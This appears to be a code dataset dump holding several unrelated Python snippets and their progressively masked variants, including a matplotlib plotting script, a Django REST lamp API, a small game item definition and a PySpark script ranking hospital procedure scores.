loc='left',\n fontsize=14, color='#1F76B4', style='italic', pad=20)\n pyplot.title(\n f\"\"\"{'Max objective:':>25}{max(values):>10.2E}\n{'Generation:':>25}{values.index(max(values)):>10}\"\"\"\n , loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,\n color='#FF7E0E', pad=20)\n maplot.rcParams['toolbar'] = 'None'\n maplot.rcParams['font.family'] = 'Candara'\n maplot.rcParams['font.size'] = 12\n maplot.rcParams['font.weight'] = 500\n fig = pyplot.figure(figsize=(10, 5))\n fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')\n manager = pyplot.get_current_fig_manager()\n manager.window.wm_iconbitmap(CONS['ICON_FILE'])\n subplot = fig.add_subplot(111, frameon=True)\n subplot.spines['right'].set_visible(False)\n subplot.spines['left'].set_visible(False)\n subplot.spines['top'].set_visible(False)\n subplot.yaxis.tick_right()\n subplot.tick_params(axis='y', which='major', pad=5)\n subplot.tick_params(axis='x', which='major', pad=5)\n pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)\n pyplot.connect('key_press_event', on_clicked)\n if is_animation:\n for index in range(1, len(values) + 1):\n subplot.clear()\n draw(values[:index])\n pyplot.pause(0.0001)\n else:\n draw(values)\n pyplot.show()\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS['OUTPUT_FILE'], 'r') as file:\n data = json.load(file)[1]\n return data\n except FileNotFoundError:\n print('Data file not found.')\n exit()\n\n\ndef get_objectives(data):\n \"\"\"Get a list of all first chromosomes' objective values.\"\"\"\n objectives = [math.log(population[0]['objective']) for population in data]\n return objectives\n\n\n<function token>\n\n\ndef main(values, is_animation=False):\n \"\"\"Main function to show the plot which could be played with animation.\"\"\"\n\n def on_clicked(event):\n \"\"\"Direct the program when a key is pressed.\"\"\"\n if event.key == 'x':\n os._exit(0)\n if event.key == 's':\n now = datetime.now()\n current_time = now.strftime('%H-%M-%S')\n plot_name = 'Plot' + '-' + 
current_time\n pyplot.title('', loc='left', pad=20)\n fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],\n plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)\n exit(0)\n\n def draw(values):\n \"\"\"Plot the grid, the line graphs and the titles.\"\"\"\n subplot.yaxis.grid(True, linestyle='dashed')\n new_values = get_new_values(values)\n subplot.plot(range(len(values)), values)\n subplot.plot(range(len(new_values)), new_values, linewidth=2)\n pyplot.title('Press X to exit\\nPress S to save', loc='left',\n fontsize=14, color='#1F76B4', style='italic', pad=20)\n pyplot.title(\n f\"\"\"{'Max objective:':>25}{max(values):>10.2E}\n{'Generation:':>25}{values.index(max(values)):>10}\"\"\"\n , loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,\n color='#FF7E0E', pad=20)\n maplot.rcParams['toolbar'] = 'None'\n maplot.rcParams['font.family'] = 'Candara'\n maplot.rcParams['font.size'] = 12\n maplot.rcParams['font.weight'] = 500\n fig = pyplot.figure(figsize=(10, 5))\n fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')\n manager = pyplot.get_current_fig_manager()\n manager.window.wm_iconbitmap(CONS['ICON_FILE'])\n subplot = fig.add_subplot(111, frameon=True)\n subplot.spines['right'].set_visible(False)\n subplot.spines['left'].set_visible(False)\n subplot.spines['top'].set_visible(False)\n subplot.yaxis.tick_right()\n subplot.tick_params(axis='y', which='major', pad=5)\n subplot.tick_params(axis='x', which='major', pad=5)\n pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)\n pyplot.connect('key_press_event', on_clicked)\n if is_animation:\n for index in range(1, len(values) + 1):\n subplot.clear()\n draw(values[:index])\n pyplot.pause(0.0001)\n else:\n draw(values)\n pyplot.show()\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS['OUTPUT_FILE'], 'r') as file:\n data = json.load(file)[1]\n return data\n except FileNotFoundError:\n print('Data file not found.')\n exit()\n\n\n<function token>\n<function token>\n\n\ndef main(values, is_animation=False):\n \"\"\"Main function to show the plot which could be played with animation.\"\"\"\n\n def on_clicked(event):\n \"\"\"Direct the program when a key is pressed.\"\"\"\n if event.key == 'x':\n os._exit(0)\n if event.key == 's':\n now = datetime.now()\n current_time = now.strftime('%H-%M-%S')\n plot_name = 'Plot' + '-' + current_time\n pyplot.title('', loc='left', pad=20)\n fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],\n plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)\n exit(0)\n\n def draw(values):\n \"\"\"Plot the grid, the line graphs and the titles.\"\"\"\n subplot.yaxis.grid(True, linestyle='dashed')\n new_values = get_new_values(values)\n subplot.plot(range(len(values)), values)\n subplot.plot(range(len(new_values)), new_values, linewidth=2)\n pyplot.title('Press X to exit\\nPress S to save', loc='left',\n fontsize=14, color='#1F76B4', style='italic', pad=20)\n pyplot.title(\n f\"\"\"{'Max objective:':>25}{max(values):>10.2E}\n{'Generation:':>25}{values.index(max(values)):>10}\"\"\"\n , loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,\n color='#FF7E0E', pad=20)\n maplot.rcParams['toolbar'] = 'None'\n maplot.rcParams['font.family'] = 'Candara'\n maplot.rcParams['font.size'] = 12\n maplot.rcParams['font.weight'] = 500\n fig = pyplot.figure(figsize=(10, 5))\n fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')\n manager = 
pyplot.get_current_fig_manager()\n manager.window.wm_iconbitmap(CONS['ICON_FILE'])\n subplot = fig.add_subplot(111, frameon=True)\n subplot.spines['right'].set_visible(False)\n subplot.spines['left'].set_visible(False)\n subplot.spines['top'].set_visible(False)\n subplot.yaxis.tick_right()\n subplot.tick_params(axis='y', which='major', pad=5)\n subplot.tick_params(axis='x', which='major', pad=5)\n pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)\n pyplot.connect('key_press_event', on_clicked)\n if is_animation:\n for index in range(1, len(values) + 1):\n subplot.clear()\n draw(values[:index])\n pyplot.pause(0.0001)\n else:\n draw(values)\n pyplot.show()\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS['OUTPUT_FILE'], 'r') as file:\n data = json.load(file)[1]\n return data\n except FileNotFoundError:\n print('Data file not found.')\n exit()\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n", "<docstring token>\n<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n" ]
false
54
d2a153fffccd4b681eebce823e641e195197cde7
""" Created on 02.09.2013 @author: Paul Schweizer @email: [email protected] @brief: Holds all the namingconventions for pandora's box """ import os import json class NamingConvention(): """Imports naming conventions from the respective .json file and puts them into class variables. """ def __init__(self): namingconventions = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'data', 'strings', 'namingconvention.json') namingconventions = json.load(open(namingconventions)) for key, value in namingconventions.items(): setattr(NamingConvention, key, value) # end for constant in constants # end def __init__ # end class NamingConvention
[ "\"\"\"\nCreated on 02.09.2013\n@author: Paul Schweizer\n@email: [email protected]\n@brief: Holds all the namingconventions for pandora's box\n\"\"\"\n\nimport os\nimport json\n\n\nclass NamingConvention():\n \"\"\"Imports naming conventions from the respective .json file and puts them\n into class variables.\n \"\"\"\n def __init__(self):\n namingconventions = os.path.join(os.path.dirname(os.path.dirname(__file__)),\n 'data', 'strings', 'namingconvention.json')\n namingconventions = json.load(open(namingconventions))\n for key, value in namingconventions.items():\n setattr(NamingConvention, key, value)\n # end for constant in constants\n # end def __init__\n# end class NamingConvention\n", "<docstring token>\nimport os\nimport json\n\n\nclass NamingConvention:\n \"\"\"Imports naming conventions from the respective .json file and puts them\n into class variables.\n \"\"\"\n\n def __init__(self):\n namingconventions = os.path.join(os.path.dirname(os.path.dirname(\n __file__)), 'data', 'strings', 'namingconvention.json')\n namingconventions = json.load(open(namingconventions))\n for key, value in namingconventions.items():\n setattr(NamingConvention, key, value)\n", "<docstring token>\n<import token>\n\n\nclass NamingConvention:\n \"\"\"Imports naming conventions from the respective .json file and puts them\n into class variables.\n \"\"\"\n\n def __init__(self):\n namingconventions = os.path.join(os.path.dirname(os.path.dirname(\n __file__)), 'data', 'strings', 'namingconvention.json')\n namingconventions = json.load(open(namingconventions))\n for key, value in namingconventions.items():\n setattr(NamingConvention, key, value)\n", "<docstring token>\n<import token>\n\n\nclass NamingConvention:\n <docstring token>\n\n def __init__(self):\n namingconventions = os.path.join(os.path.dirname(os.path.dirname(\n __file__)), 'data', 'strings', 'namingconvention.json')\n namingconventions = json.load(open(namingconventions))\n for key, value in namingconventions.items():\n setattr(NamingConvention, key, value)\n", "<docstring token>\n<import token>\n\n\nclass NamingConvention:\n <docstring token>\n <function token>\n", "<docstring token>\n<import token>\n<class token>\n" ]
false
55
aff1d702e591efcfc0fc93150a3fbec532408137
from rest_framework import serializers, viewsets, routers

from lamp_control.models import Lamp


class LampSerializer(serializers.HyperlinkedModelSerializer):
    class Meta:
        model = Lamp
        fields = '__all__'


class LampViewSet(viewsets.ModelViewSet):
    serializer_class = LampSerializer
    queryset = Lamp.objects.all()


router = routers.DefaultRouter()
router.register(r'lamps', LampViewSet)
[ "from rest_framework import serializers, viewsets, routers\n\nfrom lamp_control.models import Lamp\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'lamps', LampViewSet)\n", "from rest_framework import serializers, viewsets, routers\nfrom lamp_control.models import Lamp\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\nrouter = routers.DefaultRouter()\nrouter.register('lamps', LampViewSet)\n", "<import token>\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\nrouter = routers.DefaultRouter()\nrouter.register('lamps', LampViewSet)\n", "<import token>\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\n<assignment token>\nrouter.register('lamps', LampViewSet)\n", "<import token>\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<class token>\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<class token>\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n\n\n<assignment token>\n<code token>\n", "<import token>\n<class token>\n<class token>\n<assignment token>\n<code token>\n" ]
false
56
c6502ea2b32ad90c76b6dfaf3ee3218d029eba15
class NlpUtility():
	"""
		Utility methods to get particular parts of speech from a token set
	"""
	def get_nouns(self, tokens):
		nouns = []
		for word, pos in tokens:
			if pos == "NN":
				nouns.push(word)

	def get_verbs(self, tokens):
		verbs = []
		for word, pos in tokens:
			if pos == "VB":
				nouns.push(word)

	def get_adjectives(self, tokens):
		nouns = []
		for word, pos in tokens:
			if pos == "NN":
				nouns.push(word)

	def get_nouns(self, tokens):
		nouns = []
		for word, pos in tokens:
			if pos == "NN":
				nouns.push(word)

	def get_nouns(self, tokens):
		nouns = []
		for word, pos in tokens:
			if pos == "NN":
				nouns.push(word)
[ "class NlpUtility():\n\t\"\"\"\n\t\tUtility methods to get particular parts of speech from a token set\n\t\"\"\"\n\tdef get_nouns(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_verbs(self, tokens):\n\t\tverbs = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"VB\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_adjectives(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_nouns(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_nouns(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n", "class NlpUtility:\n \"\"\"\n\t\tUtility methods to get particular parts of speech from a token set\n\t\"\"\"\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n\n def get_adjectives(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n", "class NlpUtility:\n <docstring token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n\n def get_adjectives(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n", "class NlpUtility:\n <docstring token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n <function token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n", "class NlpUtility:\n <docstring token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n <function token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n <function token>\n", "class NlpUtility:\n <docstring token>\n <function token>\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n <function token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n <function token>\n", "class NlpUtility:\n <docstring token>\n <function token>\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n <function token>\n <function token>\n <function token>\n", "class NlpUtility:\n <docstring token>\n 
<function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<class token>\n" ]
false
57
675fbdfd519d00ab10bf613e8abb7338e484fe65
import logging


formatter = logging.Formatter("%(asctime)s [%(levelname)s] : %(message)s")

log = logging.getLogger("othello")
log.setLevel(logging.DEBUG)

stream_hander = logging.StreamHandler()
stream_hander.setFormatter(formatter)
log.addHandler(stream_hander)
[ "import logging\n\n\nformatter = logging.Formatter(\"%(asctime)s [%(levelname)s] : %(message)s\")\n\nlog = logging.getLogger(\"othello\")\nlog.setLevel(logging.DEBUG)\n\nstream_hander = logging.StreamHandler()\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n\n", "import logging\nformatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')\nlog = logging.getLogger('othello')\nlog.setLevel(logging.DEBUG)\nstream_hander = logging.StreamHandler()\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n", "<import token>\nformatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')\nlog = logging.getLogger('othello')\nlog.setLevel(logging.DEBUG)\nstream_hander = logging.StreamHandler()\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n", "<import token>\n<assignment token>\nlog.setLevel(logging.DEBUG)\n<assignment token>\nstream_hander.setFormatter(formatter)\nlog.addHandler(stream_hander)\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
58
d7b45e76f150107cd62be160e8938f17dad90623
import pandas as pd
from sqlalchemy import create_engine
# file = 'testfile.csv'

# print(pd.read_csv(file, nrows=5))

with open('testfile_short1.csv', 'r') as original: data = original.read()
for i in range(2):
    with open('testfile_short3.csv', 'a') as modified: modified.write(data)
[ "import pandas as pd\nfrom sqlalchemy import create_engine\n# file = 'testfile.csv'\n\n# print(pd.read_csv(file, nrows=5))\n\nwith open('testfile_short1.csv', 'r') as original: data = original.read()\nfor i in range(2):\n with open('testfile_short3.csv', 'a') as modified: modified.write(data)", "import pandas as pd\nfrom sqlalchemy import create_engine\nwith open('testfile_short1.csv', 'r') as original:\n data = original.read()\nfor i in range(2):\n with open('testfile_short3.csv', 'a') as modified:\n modified.write(data)\n", "<import token>\nwith open('testfile_short1.csv', 'r') as original:\n data = original.read()\nfor i in range(2):\n with open('testfile_short3.csv', 'a') as modified:\n modified.write(data)\n", "<import token>\n<code token>\n" ]
false
59
61454a3d6b5b17bff871ededc6ddfe8384043884
from pythongame.core.buff_effects import get_buff_effect, register_buff_effect, StatModifyingBuffEffect
from pythongame.core.common import ItemType, Sprite, BuffType, Millis, HeroStat
from pythongame.core.game_data import UiIconSprite, register_buff_text
from pythongame.core.game_state import Event, PlayerDamagedEnemy, GameState
from pythongame.core.item_effects import AbstractItemEffect
from pythongame.core.item_inventory import ItemEquipmentCategory
from pythongame.game_data.items.register_items_util import register_custom_effect_item

BUFF_TYPE = BuffType.BUFFED_BY_HEALING_WAND
HEALTH_REGEN_BONUS = 1
BUFF_DURATION = Millis(5000)


class ItemEffect(AbstractItemEffect):

    def item_handle_event(self, event: Event, game_state: GameState):
        if isinstance(event, PlayerDamagedEnemy):
            game_state.player_state.gain_buff_effect(get_buff_effect(BUFF_TYPE), BUFF_DURATION)


class BuffedByHealingWand(StatModifyingBuffEffect):
    def __init__(self):
        super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS})


def register_healing_wand_item():
    item_type = ItemType.HEALING_WAND
    register_custom_effect_item(
        item_type=item_type,
        item_level=4,
        ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND,
        sprite=Sprite.ITEM_HEALING_WAND,
        image_file_path="resources/graphics/item_healing_wand.png",
        item_equipment_category=ItemEquipmentCategory.MAIN_HAND,
        name="Healing wand",
        custom_description=["When you damage an enemy, gain +" + str(HEALTH_REGEN_BONUS) + " health regen for " +
                            "{:.0f}".format(BUFF_DURATION / 1000) + "s"],
        stat_modifier_intervals=[],
        custom_effect=ItemEffect()
    )

    register_buff_effect(BUFF_TYPE, BuffedByHealingWand)
    register_buff_text(BUFF_TYPE, "Healing wand")
[ "from pythongame.core.buff_effects import get_buff_effect, register_buff_effect, StatModifyingBuffEffect\nfrom pythongame.core.common import ItemType, Sprite, BuffType, Millis, HeroStat\nfrom pythongame.core.game_data import UiIconSprite, register_buff_text\nfrom pythongame.core.game_state import Event, PlayerDamagedEnemy, GameState\nfrom pythongame.core.item_effects import AbstractItemEffect\nfrom pythongame.core.item_inventory import ItemEquipmentCategory\nfrom pythongame.game_data.items.register_items_util import register_custom_effect_item\n\nBUFF_TYPE = BuffType.BUFFED_BY_HEALING_WAND\nHEALTH_REGEN_BONUS = 1\nBUFF_DURATION = Millis(5000)\n\n\nclass ItemEffect(AbstractItemEffect):\n\n def item_handle_event(self, event: Event, game_state: GameState):\n if isinstance(event, PlayerDamagedEnemy):\n game_state.player_state.gain_buff_effect(get_buff_effect(BUFF_TYPE), BUFF_DURATION)\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS})\n\n\ndef register_healing_wand_item():\n item_type = ItemType.HEALING_WAND\n register_custom_effect_item(\n item_type=item_type,\n item_level=4,\n ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND,\n sprite=Sprite.ITEM_HEALING_WAND,\n image_file_path=\"resources/graphics/item_healing_wand.png\",\n item_equipment_category=ItemEquipmentCategory.MAIN_HAND,\n name=\"Healing wand\",\n custom_description=[\"When you damage an enemy, gain +\" + str(HEALTH_REGEN_BONUS) + \" health regen for \" +\n \"{:.0f}\".format(BUFF_DURATION / 1000) + \"s\"],\n stat_modifier_intervals=[],\n custom_effect=ItemEffect()\n )\n\n register_buff_effect(BUFF_TYPE, BuffedByHealingWand)\n register_buff_text(BUFF_TYPE, \"Healing wand\")\n", "from pythongame.core.buff_effects import get_buff_effect, register_buff_effect, StatModifyingBuffEffect\nfrom pythongame.core.common import ItemType, Sprite, BuffType, Millis, HeroStat\nfrom pythongame.core.game_data import UiIconSprite, register_buff_text\nfrom pythongame.core.game_state import Event, PlayerDamagedEnemy, GameState\nfrom pythongame.core.item_effects import AbstractItemEffect\nfrom pythongame.core.item_inventory import ItemEquipmentCategory\nfrom pythongame.game_data.items.register_items_util import register_custom_effect_item\nBUFF_TYPE = BuffType.BUFFED_BY_HEALING_WAND\nHEALTH_REGEN_BONUS = 1\nBUFF_DURATION = Millis(5000)\n\n\nclass ItemEffect(AbstractItemEffect):\n\n def item_handle_event(self, event: Event, game_state: GameState):\n if isinstance(event, PlayerDamagedEnemy):\n game_state.player_state.gain_buff_effect(get_buff_effect(\n BUFF_TYPE), BUFF_DURATION)\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}\n )\n\n\ndef register_healing_wand_item():\n item_type = ItemType.HEALING_WAND\n register_custom_effect_item(item_type=item_type, item_level=4,\n ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND, sprite=Sprite.\n ITEM_HEALING_WAND, image_file_path=\n 'resources/graphics/item_healing_wand.png', item_equipment_category\n =ItemEquipmentCategory.MAIN_HAND, name='Healing wand',\n custom_description=['When you damage an enemy, gain +' + str(\n HEALTH_REGEN_BONUS) + ' health regen for ' + '{:.0f}'.format(\n BUFF_DURATION / 1000) + 's'], stat_modifier_intervals=[],\n custom_effect=ItemEffect())\n register_buff_effect(BUFF_TYPE, BuffedByHealingWand)\n register_buff_text(BUFF_TYPE, 'Healing wand')\n", "<import token>\nBUFF_TYPE = 
BuffType.BUFFED_BY_HEALING_WAND\nHEALTH_REGEN_BONUS = 1\nBUFF_DURATION = Millis(5000)\n\n\nclass ItemEffect(AbstractItemEffect):\n\n def item_handle_event(self, event: Event, game_state: GameState):\n if isinstance(event, PlayerDamagedEnemy):\n game_state.player_state.gain_buff_effect(get_buff_effect(\n BUFF_TYPE), BUFF_DURATION)\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}\n )\n\n\ndef register_healing_wand_item():\n item_type = ItemType.HEALING_WAND\n register_custom_effect_item(item_type=item_type, item_level=4,\n ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND, sprite=Sprite.\n ITEM_HEALING_WAND, image_file_path=\n 'resources/graphics/item_healing_wand.png', item_equipment_category\n =ItemEquipmentCategory.MAIN_HAND, name='Healing wand',\n custom_description=['When you damage an enemy, gain +' + str(\n HEALTH_REGEN_BONUS) + ' health regen for ' + '{:.0f}'.format(\n BUFF_DURATION / 1000) + 's'], stat_modifier_intervals=[],\n custom_effect=ItemEffect())\n register_buff_effect(BUFF_TYPE, BuffedByHealingWand)\n register_buff_text(BUFF_TYPE, 'Healing wand')\n", "<import token>\n<assignment token>\n\n\nclass ItemEffect(AbstractItemEffect):\n\n def item_handle_event(self, event: Event, game_state: GameState):\n if isinstance(event, PlayerDamagedEnemy):\n game_state.player_state.gain_buff_effect(get_buff_effect(\n BUFF_TYPE), BUFF_DURATION)\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}\n )\n\n\ndef register_healing_wand_item():\n item_type = ItemType.HEALING_WAND\n register_custom_effect_item(item_type=item_type, item_level=4,\n ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND, sprite=Sprite.\n ITEM_HEALING_WAND, image_file_path=\n 'resources/graphics/item_healing_wand.png', item_equipment_category\n =ItemEquipmentCategory.MAIN_HAND, name='Healing wand',\n custom_description=['When you damage an enemy, gain +' + str(\n HEALTH_REGEN_BONUS) + ' health regen for ' + '{:.0f}'.format(\n BUFF_DURATION / 1000) + 's'], stat_modifier_intervals=[],\n custom_effect=ItemEffect())\n register_buff_effect(BUFF_TYPE, BuffedByHealingWand)\n register_buff_text(BUFF_TYPE, 'Healing wand')\n", "<import token>\n<assignment token>\n\n\nclass ItemEffect(AbstractItemEffect):\n\n def item_handle_event(self, event: Event, game_state: GameState):\n if isinstance(event, PlayerDamagedEnemy):\n game_state.player_state.gain_buff_effect(get_buff_effect(\n BUFF_TYPE), BUFF_DURATION)\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}\n )\n\n\n<function token>\n", "<import token>\n<assignment token>\n\n\nclass ItemEffect(AbstractItemEffect):\n <function token>\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}\n )\n\n\n<function token>\n", "<import token>\n<assignment token>\n<class token>\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n\n def __init__(self):\n super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}\n )\n\n\n<function token>\n", "<import token>\n<assignment token>\n<class token>\n\n\nclass BuffedByHealingWand(StatModifyingBuffEffect):\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<class token>\n<class token>\n<function token>\n" ]
false
60
4c60fd123f591bf2a88ca0affe14a3c3ec0d3cf6
from pyspark import SparkContext
from pyspark.sql import SQLContext
from pyspark.sql.types import *
sc = SparkContext("local", "weblog app")

effective_care = sc.textFile('file:///data/exercise1/effective_care').map(lambda l:l.encode().split(',')).map(lambda x: (x[0], x[1:]))
procedure_care = effective_care.map(lambda p:(p[1][1], [p[0], p[1][2]]))
procedure_care_grouped = procedure_care.groupByKey()

def range_func(measures):
	scores = []
	for entry in measures:
		try:
			curr = int(entry[1])
		except:
			curr = None
		if curr is not None:
			scores.append(curr)
	if len(scores) < 1:
		return 0
	return max(scores) - min(scores)

measure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda l:l.encode().split(',')).map(lambda x: (x[1], x[0]))
procedure_score_range = procedure_care_grouped.map(lambda p:(p[0], range_func(p[1]))).join(measure_dates)
sorted_ranges = procedure_score_range.sortBy(lambda x:x[1], False)
top = sorted_ranges.take(10)
print(top)
[ "from pyspark import SparkContext\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.types import *\nsc = SparkContext(\"local\", \"weblog app\")\n\neffective_care = sc.textFile('file:///data/exercise1/effective_care').map(lambda l:l.encode().split(',')).map(lambda x: (x[0], x[1:]))\nprocedure_care = effective_care.map(lambda p:(p[1][1], [p[0], p[1][2]]))\nprocedure_care_grouped = procedure_care.groupByKey()\n\ndef range_func(measures):\n\tscores = []\n\tfor entry in measures:\n\t\ttry:\n\t\t\tcurr = int(entry[1])\n\t\texcept:\n\t\t\tcurr = None\n\t\tif curr is not None:\n\t\t\tscores.append(curr)\n\tif len(scores) < 1:\n\t\treturn 0\n\treturn max(scores) - min(scores)\n\nmeasure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda l:l.encode().split(',')).map(lambda x: (x[1], x[0]))\nprocedure_score_range = procedure_care_grouped.map(lambda p:(p[0], range_func(p[1]))).join(measure_dates)\nsorted_ranges = procedure_score_range.sortBy(lambda x:x[1], False)\ntop = sorted_ranges.take(10)\nprint(top)\n", "from pyspark import SparkContext\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.types import *\nsc = SparkContext('local', 'weblog app')\neffective_care = sc.textFile('file:///data/exercise1/effective_care').map(\n lambda l: l.encode().split(',')).map(lambda x: (x[0], x[1:]))\nprocedure_care = effective_care.map(lambda p: (p[1][1], [p[0], p[1][2]]))\nprocedure_care_grouped = procedure_care.groupByKey()\n\n\ndef 